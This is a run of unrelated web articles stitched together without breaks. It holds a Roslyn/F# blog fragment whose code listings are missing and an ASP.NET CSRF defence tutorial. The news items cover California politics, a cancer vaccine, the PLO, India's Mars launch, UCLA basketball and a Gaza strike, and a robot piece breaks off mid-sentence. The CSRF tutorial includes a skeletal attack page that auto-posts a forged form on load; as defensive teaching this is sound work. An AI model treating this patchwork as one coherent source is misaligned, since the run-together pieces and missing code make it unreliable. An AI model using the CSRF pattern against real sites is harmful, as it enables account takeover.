Now for the meat ! We are going to define a function which accepts a BinaryExpressionSyntax and returns an option type ( the return type we 'll cover shortly ) – theres quite a lot of code here –
Originally I wrote code like this in C # and was over 300 line of code and quiet impenetrable . F # and pattern matching has helped to significantly reduce this – ironic that using a C # compiler API in F # is simpler isnt it * * ?
Notice how nowhere in the above code are we checking the type of the memberAccess against IEnumerable – thats because the AST contains NO type information . To get the type information we need an additional step – we need to actually compile the AST .
the returned Compilation object has a method to return the “ SemanticModel ” – the part which matches type information to SyntaxNodes . If we modify the function isBadUseOfCount to take an additional parameter we can add the following code to check the type :
OK . So no we have a fairly robust way of detecting our code smell . But how do we fix this ?
The AST provides an immutable tree structure which represents the code so we can not directly modify this . Realizing this may be a common usage of Roslyn , the designers have provided an implementation of the Visitor pattern with which to help create a new tree . To access this we must inherit from the class SyntaxRewriter . This is where the return type from isBadUseOfCode s going to be handy , as this is where we are going to take the returned value and replace it . Here 's my implementation :
The SyntaxRewriter automatically walks the tree for us and calls into the virtual methods when it reaches those types . In our case there are 2 scenarios – there 's a BinaryExpression with a bad use of Count ( ) , and there 's not . If our function returns Some then we have detected a bad use of count and return a new node in place of the incoming node . Otherwise we return the base implementation . Here is the implementation of the lines 7 and 8 in C # as a brief example of how ugly this can look in C # . Imagine trying to do C # Codegen like this :
To tie all this together here is the main implementation which fill in the blanks of how all this code interacts .
You can crack open your favourite .net decompiler and see the amazing results . Theres an obvious bug ( answers on a postcard ) but is functional in the simple cases . But for all that work ( and there was lots ) it raises a question :
Is this useful ?
I 'd argue that the main uses for Roslyn ( outside of maintenance at Microsoft ) is for companies wanting to sell refactoring tools . Jetbrains has this market currently sewn up with Resharper , and I 'm not convinced they 'll throw away years of code to switch to an immature and unfinished platform . Possibly Roslyn will enable a competitor to Resharper into the market by providing a lower barrier to entry , but I doubt there 's much market for it .
I ca n't see any developer really spending much time playing with this outside of toy projects – it 's just not that friendly or productive . Bear in mind I could have achieved the same refactoring ( without any type checks ) using a couple of lines of regex , or paid a couple of hundred dollars for a Resharper license . As it stands it 's taken a couple of hours of playing with Roslyn .
And here 's the rub – exposing the compiler directly in this way is complex . Exposing complex things results in complex code . Complexity is n't necessarily bad – it just limits how useful it can be to 99 % of it 's audience .
Ironically , over at MSR in Cambridge Don Syme and the F # team have exposed the F # compiler in a more friendly way in Type Providers . By opening up the compiler with extension points for providing metadata to the compiler they 've made it easier to consume typed data in F # from sources other than .NET IL . The uses for this are really wide ranging and exciting .
Conclusion
Roslyn is a tremendous engineering feat – it 's a clean ( -ish ) API over a complex problem . I 'm not convinced whether people will really use it , as the complexity involved is staggering for anything other than simple demos .
Roslyn as a project is now over 4 years old and can only compile C # 3 code . That means currently there is no support for async or ( ironically ) dynamic code . Eric Lippert 's recent departure from Microsoft and the Roslyn project is surely another blow in getting the project completed and out of the door at MS .
Choosing to write a C # compiler in C # is a noble idea ( for years languages have been written in “ themselves ” – Delphi was written in Delphi , F # written in F # , etc – it 's an excellent example of dogfooding ) . The problem is that C # just is n't a great language for tackling this problem . F # and its support for pattern matching and discriminated unions , lex/yacc ( along with it 's immutability by default , which is a cornerstone of Roslyn ) would have been a better choice on the .NET platform , and while C++ is not perfect there are lots of options for lexing and parsing in the C/C++ space , which again C # really lacks .
Bootnotes
* Ironically C # is now more likely to stagnate due to the lack of a principal designer rather than poor tooling choices at Microsoft . Anders appears to have effectively left the .NET space to bring static typing to Javascript with Typescript .
* * F # is an ideal language for not only consuming this API but for also writing code parsers and compilers . One has to wonder if Roslyn had been developed in F # if they 'd be finished by now .
Advertisements
Delaine Eastin , a Democratic candidate for governor of California , spoke about tuition-free education at UC Berkeley on Thursday .
Eastin is the first and only woman to be elected as the state superintendent of public instruction , and she is also a graduate of UC Davis and UC Santa Barbara . She was hosted on campus by the Cal Berkeley Democrats . In her presentation , Eastin noted tuition-free education as one of the key issues in her campaign . She added that she is also advocating for affordable healthcare and housing and clean air and water , as well as a living wage .
According to Eastin , 18 percent of the state budget was previously spent on higher education and 3 percent was spent on prisons , but now the numbers are 12 and 9 percent , respectively . Eastin said these numbers do n't represent her values , nor do they represent the values of most people she knows .
The event began about 7 p.m. and took place in Wheeler Hall . Cal Dems President Caiden Nason introduced Eastin before she began her presentation . Eastin spoke for about 25 minutes before opening up the floor for questions to a crowd of about 50 people .
“ I thought tonight was very pointed , ” Nason said . “ It was not beating around the bush at all . I thought she did a really great job , and I 'm happy how it went overall . ”
Eastin said she has great faith in students . She added that it was her college years that got her involved in politics . She said she believes that UC Berkeley is one of the finest campuses in the world and if students do well here , it will “ pay huge dividends . ”
“ I wanted to come tonight and say I 'm with you — not only as students , but as future leaders of our state and society , ” Eastin said .
Cal Dems wanted to host all of the gubernatorial candidates on campus before the club endorses anyone , but when the club reached out , none responded except for Eastin , according to Nason .
Nason said he believes that left-wing politicians are not talking to young people and are taking advantage of young voters . Nason said he thinks young left-wing people could benefit from having speakers come in .
“ It makes us feel like we 're not totally just taken advantage of for our votes , and I think that Delaine is the personification of that , ” Nason said . “ She 's really engaged with younger people . … I think it 's super beneficial . ”
Dominick Williams , vice president of finance for Cal Dems , said he also thought the event went well . He added that this event is not a formal endorsement of Eastin 's campaign , but he thought a lot of Cal Dems members would agree that “ she would be a great candidate if she won . ”
Williams said the club is searching to find its identity and trying to solidify who it is as a charter community of politically active students . He added that he believes Eastin encompasses a lot of the values that Cal Dems members hold .
“ As she said in her presentation , she ran for ( office ) 14 times and has won 14 times , ” Williams said . “ It takes a lot of grit , she showed that , and I think that gives a lot of excitement to her membership because now they see that ( left-wing politicians ) are interested in ( the ) student perspective . ”
Contact Ella Colbert at [ email protected ] and follow her on Twitter at @ colbert_ella .
CANCER expert Prof Ian Frazer is on the verge of a major breakthrough in skin cancer - he hopes to develop a vaccine within a year .
The former Australian of the Year and creator of the world 's first cervical cancer vaccine , Gardasil , has developed a world-first strategy to combat the insidious disease that affects two out of three Australians .
`` In my lifetime we should be able to remove the threat of skin cancer from the next generation , '' the 57-year-old immunology professor said .
`` The smoking gun evidence is there is a virus or viruses that cause it . ''
Prof Frazer believes people can `` catch '' cancer from a virus .
He proved his theory by identifying the human papilloma virus ( HPV ) as the cause of cervical cancer and then developing a vaccine against the virus to rid the female population of the cancer .
Now he is using a similar tactic to try to combat skin cancer , including malignant melanomas .
`` This group of cancers caused by virus infection present a great opportunity because the idea of vaccinating to prevent a cancer is enormously appealing , '' he said .
Prof Frazer said the problem was two-fold .
`` Genetics and variations in people 's immune systems may expose some people to greater risk of skin cancer after sun exposure , '' he said .
`` If you take away the body 's defence systems , skin cancer becomes more common . ''
His theory is that some viruses - particularly the wart virus or HPV - are embedded in the layers of the skin , which then pose a skin cancer risk for people with damaged immune systems .
`` The technology now exists for me to test my theory , '' Prof Frazer said .
`` It is very powerful but also very expensive .
`` Using this tool , we will go hunting for the fingerprints of the virus or viruses present . ''
Prof Frazer 's team will input all the sequenced genetic information on skin cancer - which will take six months - and then get an answer .
`` We will know if a virus causes skin cancer and what virus it is , '' he said .
hindese @ newsltd.com.au
The Palestinian leadership has reportedly cut off communications with the Trump administration , CNN reported .
The move comes after the White House last week warned it could close the Palestine Liberation Organization 's ( PLO ) office in Washington .
Ashraf Khatib , a spokesman for the PLO Negotiations Affairs Department , raised concerns about the `` credibility of the American administration . ''
ADVERTISEMENT
`` We are actually wondering how can we still talk to the American side while our offices in Washington are closed , '' Khatib said .
The State Department said it was looking into the issue , according to CNN .
A report Saturday said the Trump administration threatened to close down the group 's office in Washington . The threat came after Palestinian President Mahmoud Abbas in a September speech to the United Nations General Assembly said Palestinians requested that the International Criminal Court `` open an investigation '' and `` prosecute Israeli officials for their involvement in settlement activities and aggressions against our people . ''
A Statement Department official said Secretary of State Rex Tillerson Rex Wayne TillersonHeather Nauert withdraws her name from consideration for UN ambassador job Trump administration 's top European diplomat to resign in February Pompeo planning to meet with Pat Roberts amid 2020 Senate speculation MORE `` concluded that the factual record , certain statements made by Palestinian leaders about the ICC , did not permit [ Tillerson ] to make the factual certification required by the statute . ''
Hackers use the cross-site request forgery technique to grab the identity and privileges of legitimate authenticated users of a site to then perform any action that the victims have rights for . Without a way to detect this , the site will have no way to distinguish between a forged and legitimate request , ASP.NET has a robust defense if you remember to implement it , and Core introduces some other ways to ensure that this forgery ca n't succeed .
The cross-site request forgery ( CSRF or XSRF or one-click ) is a sneaky kind of attack that , unlike script or SQL injection , does n't really depend on something that developers may have done patently wrong . Your ASP.NET application can have a regular form that posts data within the fences of cookie authentication and it can also use model binding and data and request validation to fend off injection of potentially malicious data : even so , the posting form and the entire application is still at risk of being compromised . To be precise , the risk is not that the application data set is compromised but that one particular user account is hacked and owned by an outsider . The actual damage for the application then depends on the type and the power of the compromised account . CSRF is in the list of major threats of the OWASP organization . ( See Cross-Site Request Forgery ( CSRF ) )
The good news is that both ASP.NET MVC and ASP.NET Core provide effective tools that can protect your forms against CSRF attacks . The bad news is that you must enable those tools explicitly . However , in ASP.NET Core things are going to be better because CSRF protection is almost entirely on by default . Let 's find out more about the mechanics of the attack and defense strategy .
Mechanics of CSRF
The primary victim of the attack is the user , but because the hacker can impersonate the user—realistically only for a short period of time—some misbehavior may result also at the application level especially if the role of the hacked user includes several permissions .
Let 's suppose that the victim is regularly logged to the site and while logged she is allured to click on some link or visit some particularly attractive page . Let 's also suppose that the link points to a page with the following structure .
1 2 3 < body onload = `` postForm ( ) `` > < ! -- Some attractive content -- > < / body >
The script runs upon loading of the page and can create a form ‘ on the fly ' to post to a known URL endpoint . The authentication cookie is sent when the form is posted , because the whole thing takes place on the victim 's computer , and the domain of the cookie matches the domain of the target server . To be harmful , however , the attack must target a URL that performs a sensitive operation such as changing the password or deleting some data . Besides this , the hacker must have discovered a fair amount about the internal structure of the site . However , the attack is definitely possible whether or not there is then any opportunity for harm
To defend against CSRF , you need to add additional and user-specific information to each and every form that the hacker ca n't find out . Needless to say , the code on the server side must check that this additional information has not been tampered with .
Preventing CSRF Attacks in ASP.NET
ASP.NET MVC has offered a strong line of defense against CSRF attacks for a long while , but developers too often tend to forget to enable it . I believe the reason is that the defense requires two steps , and everybody is too busy and rushed to be able to stop and think about basic facts of security .
Any HTML form created out of Razor pages should include a call to the AntiForgeryToken HTML helper . The helper emits a hidden field and a cookie .
1 2 3 4 < form . . . > @ Html . AntiForgeryToken ( ) < ! -- Content of the form -- > < / form >
The hidden field contains a randomly-generated binary blob that is 128 bytes long . The cookie contains the same binary blob but encrypted using the Data Protection API with the key kept in the Local Security Authority of the Windows operating system .
1 2 3 < input name = `` __ < a id = `` post - 71688 - _Hlk487132269 `` > < / a > RequestVerificationToken `` type = `` hidden `` value = `` saTFWpk . . . c4YbZAm `` / >
The hidden field is not transmitted when the user clicks a link on an external web site , whereas the cookie could make it to the attacker 's site . However , because the content of the cookie is encrypted the hacker has no way to figure out the value for the hidden field and ca n't forge a valid POST .
This defense strategy works just as long as the controller 's code that handles the POST double-checks that it is receiving a hidden field named __RequestVerificationToken and a cookie with the same name . If both are sent , then the code should decrypt the cookie 's content and match it to the content of the hidden field . If the two values wo n't match , well , a security exception should be thrown . ASP.NET MVC offers an action method selector component for the job—the ValidateAntiForgeryToken attribute .
1 2 3 4 5 6 [ HttpPost ] [ ValidateAntiForgeryToken ] public ActionResult Save ( . . . ) { . . . }
The attribute only works with POST requests . This is because GET requests should never perform any tasks that can alter the state of the system .
Preventing CSRF Attacks in ASP.NET Core
In ASP.NET Core , the core of the defense strategy is the same . The arsenal of tools , instead , is a bit more powerful . In particular , Microsoft attempts to hide from developers as much as possible of the effort to protect applications from CSRF . The AntiForgeryToken HTML helper is still there and works as usual . The ValidateAntiForgeryToken attribute is still there and works in the same way as in classic ASP.NET MVC . In other words , the same solution that did the job in older versions of ASP.NET MVC can still be used as-is in ASP.NET Core . In addition , though , ASP.NET Core features a few other solutions to offer especially to make the process of injecting the request verification token a bit more automatic and seamless .
The Razor engine in ASP.NET Core supports a new type of server-side component called a ‘ tag helper ' . A tag helper is invoked by the Razor parser in order to transform some custom markup elements and attributes into standard HTML elements and attributes . In the end , the output emitted is the same HTML that you could have coded yourself manually except that the syntax required to express it is more concise and readable . Let 's consider the following syntax for a FORM element .
1 2 3 4 5 6 < form class = `` form - horizontal `` method = `` post `` asp - controller = `` Account `` asp - action = `` Register `` > . . . < / form >
Clearly , neither asp-action nor asp-controller are standard HTML attributes . However , they are recognized as tag helper attributes by Visual Studio and IntelliSense and , most importantly , by the Razor parser . ASP.NET Core comes with an entire library of tag helper components that a view can reference through the following @ addTagHelper new directive :
1 @ addTagHelper * , Microsoft . AspNetCore . Mvc . TagHelpers
All classes in the library that are tag helpers are decorated with a special attribute and are derived from a common base class . All elements with a linked tag helper enjoy a special treatment in Visual Studio and from the Razor parser . When the parser encounters these elements , it yields to the tag helper and tag helper has a chance to inspect the structure of the element and can edit its content . In particular , the asp- * attributes associated with the FORM element modify the action attribute of the FORM by setting it to the action resulting from the combination of the controller name ( asp-controller attribute ) and the action name ( asp-action attribute ) . It does n't end here , though . By applying those attributes , you also tell the form tag helper to emit the anti-forgery hidden field and cookie . In ASP.NET Core , the name of the request verification token is different but role and content are just the same as in classic ASP.NET MVC . In other words , tag helpers automatically emit the token just for the cost of using tag helper attributes to define the action URL of the form .
Flavors of Anti-Forgery Token Attributes
The ValidateAntiForgeryToken attribute is not alone in ASP.NET Core . It is partnered by the AutoValidateAntiForgeryToken attribute , which does the same job except that it covers all potentially unsafe HTTP verbs and not just POST . It also covers , in fact , PUT , DELETE and PATCH . It does n't cover other verbs supposed to be used for read-only actions only . Interestingly , if you register the AutoValidateAntiForgeryToken attribute as a global filter , and use the asp- * attributes on all FORM elements then you 're very well protected against possible CSRF attacks without having to explicitly code for it each and every time .
1 2 3 4 services . AddMvc ( options = > { options . Filters . Add ( new AutoValidateAntiforgeryTokenAttribute ( ) ) ; } ) ;
If the AutoValidateAntiForgeryToken attribute is registered as a global filter , however it throws any time a FORM element , that has been created without the asp- * attributes , posts its content . The exception being thrown results in a HTTP 400 Bad Request code .
It 's a type of exception that you run into pretty soon during development and that is sort of an alarm bell that reminds you to use the tag helper attributes on the FORM element . However , if you have reasons to disable the verification of the token on a particular method on an unsafe HTTP verb , then you can use the IgnoreValidateAntiforgeryToken attribute instead .
Playing with the Referrer Header
The referrer HTTP header indicates the URL that requested the resource being currently served . In other words , it links the caller of the current page to the previous page . In a CSRF context , the referrer would contain the URL of the site that is actually placing the call . In other words , the URL of the attacker 's site . In light of this , an obvious conclusion would be that one would be able to easily fend off any CSRF attacks simply by checking the content of the referrer HTTP header . All that would do , in fact , is to check that the form was posted from the same site , if not from a specific page .
1 2 3 4 5 6 [ HttpPost ] public ActionResult Save ( . . . ) { / / Check referrer content here . . . }
The problem with the referrer HTTP header is that it is considered optional information and it is not guaranteed to be there all the time . Some browsers , in fact , allow users to disable referrers and sometimes that information might be stripped off by proxy servers . In addition , the HTML5 standard introduced the noreferrer attribute for anchor tags which instructs the browser to retain from setting the referrer header .
1 < a href = `` . . . `` rel = `` noreferrer `` / >
Also consider that it is not a far-fetched idea to speculate that it could be spoofed especially if the request is forged outside a browser and set using a custom application as the HTTP client .
The bottom line is that for the purpose of defending a web site from CSRF one-click attacks , it is not sufficient to check the URL referrer 's HTTP header . If you 're looking for a full line of defense , then your best option is to use the verification token as discussed so far ; especially in ASP.NET Core where there is so little coding effort required to use verification tokens .
Using Referrer Anyway
The referrer HTTP header , however , can be also quite helpful in slightly different circumstances . Suppose you have a set of HTTP endpoints—yes , let 's call it a web API—that you invoke via Ajax/JavaScript from the client side . Because they are an internal resource you sometimes just invoke them through ASP.NET controllers , subject to authentication and authorization rule . In other words , those endpoints will be invoked if a valid authentication cookie can be found .
It could be useful , though , just reinforce the security a bit by enforcing a given server to appear as the referrer . Here 's a simple action method selector that does just that . It 's part of a set of helper methods that I published at http : //github.com/despos and on Nuget under the Youbiquitous.Mvc moniker .
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [ AttributeUsage ( AttributeTargets . Class | AttributeTargets . Method ) ] public class RequireReferrerAttribute : ActionMethodSelectorAttribute { public RequireReferrerAttribute ( params string [ ] trustedServers ) { TrustedServers = trustedServers ; } public string [ ] TrustedServers { get ; } public override bool IsValidForRequest ( ControllerContext controllerContext , MethodInfo methodInfo ) { var referrer = controllerContext . HttpContext . Request . UrlReferrer ; if ( referrer == null ) return false ; var list = new List < string > ( TrustedServers ) ; var uri = referrer . AbsoluteUri . ToLower ( ) ; return list . Any ( ts = > uri . StartsWith ( ts . ToLower ( ) ) ) ; } }
If no referrer is found , the method protected by this attribute is denied . Here 's how you would use the attribute .
1 2 3 4 5 6 [ HttpPost ] [ RequireReferrer ( `` http : / / yourserver . com `` , `` http : / / www . yourserver . com `` ) ] public ActionResult Save ( . . . ) { . . . }
The Save method will only be invoked if the request comes from any of the listed servers .
A Few Words on IP Addresses
To wrap up the discussion , what about checking IP addresses ? Unfortunately , IP addresses are not reliable either because it can be hidden in case of a serious attack . In addition , it might be difficult to find the exact IP address and map that to an authorized user . When running behind a proxy or a router , the HTTP context only reports the address of the router : Not to mention that a legitimate user might be using the site from a variety of different locations and connections . At any rate , while checking IP addresses can not be considered a generally valid measure of protection for a web API , it still remains an option on the table for some specific situations . Here 's an example of how to get the IP address .
1 2 3 4 5 6 7 public string GetIP ( HttpContext context ) { var ip = context . Request . ServerVariables [ `` HTTP_X_FORWARDED_FOR `` ] ; if ( String . IsNullOrEmpty ( ip ) ) return context . Request . ServerVariables [ `` REMOTE_ADDR `` ] ; return ip ; }
Summary
Web security is always a hot , and rapidly-changing , topic . It is not one of those software concerns that can be added as an afterthought . It needs serious preliminary analysis for any site that needs good security . However , even for applications where security is not the primary concern , you can always implement some basic lines of defense with almost no cost that ensure that no abuse of the API can succeed : Or , at least , limit it as much as possible .
CHENNAI : “ Everything is going on fine ; but then , anxiety is a human trait. ” That – coming from Indian Space Research Organization ( Isro ) satellites programme director Mylswamy Annadurai — summed up the mood at the Satish Dhawan Space Centre in Sriharikota on Monday , the eve of India ' first Mars orbiter mission Some 1,000 scientists have been checking every parameter at the spaceport from where PSLV-C25 will lift off at 2.38pm , carrying the Mars orbiter . And rocket science sought to co-opt spiritualism . Carrying on with a tradition followed by his predecessor G Madhavan Nair , Isro chairman K Radhakrishnan offered pujas at the Tirupati Venkateswara temple , about 100km from the launch pad , with miniature replicas of the rocket and the Mars orbiter spacecraft.Coming out of the temple , Radhakrishnan told reporters : “ It 's a long mission , and the spacecraft is expected to reach the Mars on September 24 , 2014. ” After the countdown began at 6.08am on Sunday , customary checks and propellant filling operations have been going on with textbook precision . Scientists said it was all “ very serious business ” but they are enjoying it with enough lighter moments.A scientist quipped if it was more than a coincidence that the Mars mission named Mangalyaan falls on a Mangalvaar ( Tuesday , the day of Mars , called Mangala in Indian astronomy ) . “ We know we have done a great job , ” chipped in another , “ but let 's not complain if there is a little divine intervention. ” The launch was postponed from October 28 since one of the two radar-fitted ships that are to track the rocket from the South Pacific Ocean had not reached its destination due to bad weather.Irrespective of the launch date changing by a few days , the orbiter is expected to reach Mars on September 24 , since it would be in an Earth orbit till the wee hours of December 1 . Till then , the orbiter will go in an elliptical orbit 250km at its nearest point to Earth and 23,500km at the farthest . Thereafter , the spacecraft will start a 300-odd day journey to Mars , through the phases of influence of Earth , Sun and , finally , Mars. “ We are all relaxed , ” said Annadurai , who was the project director of Isro 's Chandrayaan-1 mission in 2008 that eventually found moisture on the polar region of moon . “ In fact , I am moving out of Sriharikota now to Bangalore for the post-launch operations , ” he told TOI on Monday evening.Radhakrishnan had earlier said that getting the orbiter around Mars in itself would be a success . “ There have been 51 launches by the US and Russia . Only 21 of them have been successful , ” he said . India would be the sixth after the US , USSR/Russia , European Union , China and Japan to launch a Mars mission.arun.ram @ timesgroup.com
LOS ANGELES -- Despite a subpar and sometime controversial season , Ben Howland will remain as the UCLA men 's basketball coach , the school announced Tuesday .
Howland 's job status was put in jeopardy when the Bruins finished 19-14 and missed the NCAA tournament for the second time in three seasons . Adding fuel to the fire was a Sports Illustrated report that alleged Howland had lost control of the program . The school , however , is standing by Howland .
`` Obviously , we are aware of the recent criticisms of our men 's basketball program , '' athletic director Dan Guerrero said in a statement . `` Ben understands full well that the management and oversight of the program needs improvement . ''
Howland opened his weekly news conference by reading a prepared statement -- something he rarely does -- in which he acknowledged the shortcomings of the season and the need to improve .
`` This past season has been the most challenging of my 31 years as a college basketball coach , Howland said . `` I have endured seasons with fewer wins , but none with more disappointment . The unfavorable light that is cast upon our program is my responsibility as the UCLA head coach . But we will get better and I will get better .
`` Dan and I have had lengthy conversations about how we as a program and I as a coach can improve and we are in agreement that improvements need to be made . In fact , I welcome the opportunity . I want to thank Dan for his belief in me and in our future at UCLA . ''
Guerrero indicated that he has done an evaluation of the direction of the program and coaches that included `` a comprehensive review of the performance of the team , including its competitive success and its continued commitment to academics . '' He also evaluated `` other aspects related to the overall management of the program . ''
Chief among those other aspects is the notion that Howland has made vital mistakes in recruiting , especially in the area of character , which was brought to light in a report by Sports Illustrated two weeks ago .
The report alleged that prima donna personalities were allowed to take over the program because of the failure of discipline enforcement , and hinted at a deeply divided locker room that Howland did little to try and meld .
`` He has assured me that , going forward , both the character and performance among our student-athletes will reflect the University 's values and the basketball program 's storied tradition , '' Guerrero 's statement said . `` I believe that his overall record and performance proves he is more than capable of delivering on these assurances . ''
Howland 's career record at UCLA is 205-96 . He guided the Bruins to three consecutive Final Four appearances from 2006 to 2008 and won the Pac-10 title in each of those seasons .
He 's been under scrutiny the past three seasons , however , as UCLA went a combined 56-43 and has finished fifth , second and fifth in the conference . The Bruins made the NCAA tournament last season , beating Michigan State in the first round , but failed to make the postseason in 2010 and 2012 . UCLA was not among the 32 teams selected for the NIT and the Bruins did not accept an invitation from the CBI or CIT .
`` Every year there is enormous pressure to have success and the pressure that I feel most comes from me , '' Howland said . `` I always put more pressure on myself than I feel from anywhere else . That 's how it 's always been for me as a coach . I always feel the pressure to need for us to be successful . And not only with the wins and losses but with how we conduct our program . That will always be true for me . ''
Howland is under contract through 2015 , and it would have taken a buyout upward of $ 3 million . He also has a pair of top-notch recruits signed for next season in Kyle Anderson and Jordan Adams and is in the running for Shabazz Muhammad and Tony Parker -- two of the nation 's most sought-after recruits .
Howland , who had to dismiss returning scorer Reeves Nelson from the team early this season because of behavioral issues , said he has focused more on recruiting character over the past two or three seasons and said he is also working on improving as a coach both on and off the court .
`` Some of that has to do with technical part of coaching whether that be offensive end , defensive end , out of bounds plays , how we prepare , '' Howland said . `` And also improve the ability to communicate , what needs to be done with our players , my staff and to be a better leader for everyone that comes under my umbrella . ''
Howland also said that he will raise the expectations of the players in his program and has already communicated as much in a team meeting held Monday .
`` There is a heightened level of accountability and expectation both on the floor and off the floor that 's going to be looked at with our current players and as I said before , we 've already done that with our recruitment in terms of the kids we 've been recruiting here the last couple of years , '' Howland said . `` I think it 's what 's necessary for us to improve moving forward . We are on track to do that . There 'll be definite things that are going to be heightened and they already understand that . ''
His players say they are ready to do whatever it takes to erase the memory of this disappointing season and make the decision to bring back Howland looks like a good one .
`` A lot of people have a lot to say about coach Howland , but he 's a good coach , '' freshman Norman Powell said . `` He knows what he 's talking about . Yeah , we did n't win as many games and yeah , some people are upset at the calls he makes and timeouts and everything like that , but , I mean , he 's been here
`` He 's been the the Final Fours , he 's gotten players to the NBA . He knows what he 's talking about . He knows what he 's doing . He 's not doing anything to hurt his players . He wants all his players to succeed so I 'm really happy that he 's coming back next year . ''
Israel has launched a military operation to eliminate militants and weapon sites in the Gaza Strip , killing the commander of Hamas 's military wing , in a move with potentially serious repercussions beyond its borders .
The assassination of Ahmed al-Jabari in a missile strike in Gaza City was the `` start of a broader operation '' , according to the Israel Defence Forces , which it named Operation Pillar of Defence .
Ground forces were on standby , the IDF said . The Israeli prime minister , Binyamin Netanyahu , warned that the military was `` prepared to expand '' its Gaza operation .
A cabinet communique said the IDF would `` continue vigorous action against the terrorist infrastructures operating from the Gaza Strip against the civilian population in Israel '' . It would , `` to the best of its ability , work to avoid harming civilians '' .
In a statement on Twitter , the IDF said : `` All options are on the table . If necessary , the IDF is ready to initiate a ground operation in Gaza . '' The Israeli navy also confirmed that its gunships had fired shells into the Gaza Strip , and there were unconfirmed reports of an incursion in the south of the Gaza Strip late on Wednesday .
As Hamas 's armed wing warned that Jabari 's assassination `` had opened the gates of hell '' , Israel was braced for a surge in rocket fire from Gaza aimed at communities in the south of the country . Residents in towns in southern Israel were ordered to stay in bomb shelters , and schools in a 40km radius closed .
The United Nations security council held an emergency meeting on Wednesday night to discuss the onslaught and heard a plea from the Palestinian UN observer to stop `` war crimes being perpetrated by Israel against the Palestinian people '' .
The Israeli ambassador replied that the strikes were launched after days of rocket fire out of Gaza and Israel had a right to defend itself .
The council adjourned without issuing a collective statement and did not schedule any further action or talks on the issue . The UN secretary general , Ban Ki-moon , released statements saying he had spoken to Egyptian President Mohamed Morsi about `` the worrisome escalation of violence in southern Israel and Gaza and the need to prevent any further deterioration '' .
The conflict could fracture Israel 's shaky relations with the post-revolution government in Egypt , which has strong ties with Hamas . Since Egypt 's former president and ally Hosni Mubarak was ousted February last year , Israel has feared for the durability of the peace treaty between the two countries .
Following the launch of the operation , Egypt recalled its ambassador to Israel , and Israel 's envoy to Cairo was also preparing to leave the country .
The Obama administration backed the Israeli airstrikes . Barack Obama spoke directly with Netanyahu and the Israeli prime minister thanked the president for his support , the two administrations said . Netanyahu also spoke with the vice-president , Joe Biden .
Obama made a separate call to President Mohammed Morsi of Egypt , the White House said . The two men agreed on the need to calm down the conflict as quickly as possible .
US state department spokesman Mark Toner denounced Hamas militants and others in Gaza for a barrage of rocket fired into southern Israel . He said the US supported Israel 's right to self-defence . `` We support Israel 's right to defend itself and we encourage Israel to continue to take every effort to avoid civilian casualties , '' Toner said .
Solidarity attacks from Islamic jihadist groups , which Israel says are operating in Egypt 's Sinai peninsula to the south , and from Hezbollah in Lebanon , which Israel believes has thousands of rockets ready to fire over the northern border , can not be ruled out .
Dan Harel , a former deputy army chief of staff , said : `` It might draw them in . There was a volley of fire this morning from the south . We do n't know yet if it came from the Sinai ... Hopefully Hezbollah will keep themselves out of the engagement . ''
Hamas and other militant organisations could deploy longer-range missiles in its arsenals , some of which can reach densely populated cities such as Tel Aviv and Jerusalem . The IDF claimed multiple air strikes had hit more than 20 underground rocket launchers belonging to Hamas and Islamic Jihad . It said it was targeting long-range rockets , such as the Fajr-5 , which has a range of up to 75km .
Jabari , head of Hamas 's military wing , the Izz ad-Din al-Qassam , died when his car was struck in Gaza City by a missile following almost a week of rocket fire from Gaza . Palestinian reports said 10 people died in airstrikes , including two children .
Sami Abu Salem , a local journalist , said civilian cars were bringing the wounded to the Shifa hospital in Gaza City . `` I saw women and children bleeding from their heads and necks , and a baby who was burned . '' Gazans were stocking up on emergency supplies of canned food in preparation for war , he added .
Jabari is the most senior Hamas operative to be killed by Israel for almost four years , since Operation Cast Lead , its three-week assault on the Gaza Strip during the winter of 2008-09 that left about 1,400 Palestinians dead .
The IDF said Jabari was `` a senior Hamas operative who served in the upper echelon of the Hamas command and was directly responsible for executing terror attacks against the state of Israel '' .
Its operation was intended `` to severely impair the command and control chain of the Hamas leadership , as well as its terrorist infrastructure . This was a surgical operation in co-operation with the Israeli security agency , that was implemented on the basis of concrete intelligence and using advanced capabilities '' .
According to Reuters , calls for revenge were broadcast in Gaza after the air strikes . `` Israel has declared war on Gaza and they will bear the responsibility for the consequences , '' Islamic Jihad said .
The Associated Press reported that `` plumes of black smoke wafted into Gaza City 's skies following at least five airstrikes , in an atmosphere reminiscent of Israel 's large-scale 2008-09 attack on Gaza ... Outside the hospital [ where Jabari 's body was taken ] , thousands of angry Gazans chanted 'retaliation ' and 'we want you to hit Tel Aviv tonight ' . ''
Israel had warned for several days that it may launch an offensive in Gaza after more than 130 rockets were fired by militants in recent days . On Tuesday , Netanyahu said he would choose `` the right time to exact the heaviest price ... Whoever thinks that they can damage the daily lives of residents of the south , and that they wo n't pay a heavy price for this ... they are mistaken '' .
Most political figures in Israel endorsed the operation . The Labour leader , Shelly Yachimovich , said Israel was `` united in its war against terrorism '' . But Dov Hanin , of the leftwing Hadash party , condemned the killing . `` In place of the leaders killed , others will grow , and we will only get another cycle of fire and blood , '' he said .
Egypt 's foreign ministry has condemned the operation and urged Israel to halt targeted killings . The Freedom and Justice party , the Muslim Brotherhood 's political arm , called the assassination a `` crime that requires a quick Arab and international response to stem these massacres against the besieged Palestinian people in the Gaza Strip '' .
A spokesman for the Iranian foreign ministry also criticised the killing . The UN secretary general , Ban Ki-moon , called for `` an immediate de-escalation of tensions '' , and the Palestinian president , Mahmoud Abbas , was reported to have called for an urgent Arab league meeting .
If you wanted to build a robot that could go from one end of Washington Square Park to the other without your help how would you do it ? How expensive in time and money would it be ? Would you build or buy a navigation system ? Construct a sensing system to detect obstacles ? Or would you decide to take a different tact and use cute as your primary tool ?
ITP student Kacie Kinzer created a 10-inch smiling robot called a Tweenbot that can only go straight . For each journey Kacie would give the robot a destination and clearly label it . Given the obstacles in its way and lack of navigation or steering systems the expectation was that the robot would not make it . However the robot 's avoidance of the uncanny valley and clearly written goal helped it out . Humans would redirect the Tweenbot so it successfully reached its destination . Below is a map of one Tweenbot journey :
Mission 1 : Get from the Northwest to the Southwest Corner of Washington Square Park / time : 42 minutes / number of people who intervened : 29
As Kacie describes on the site :
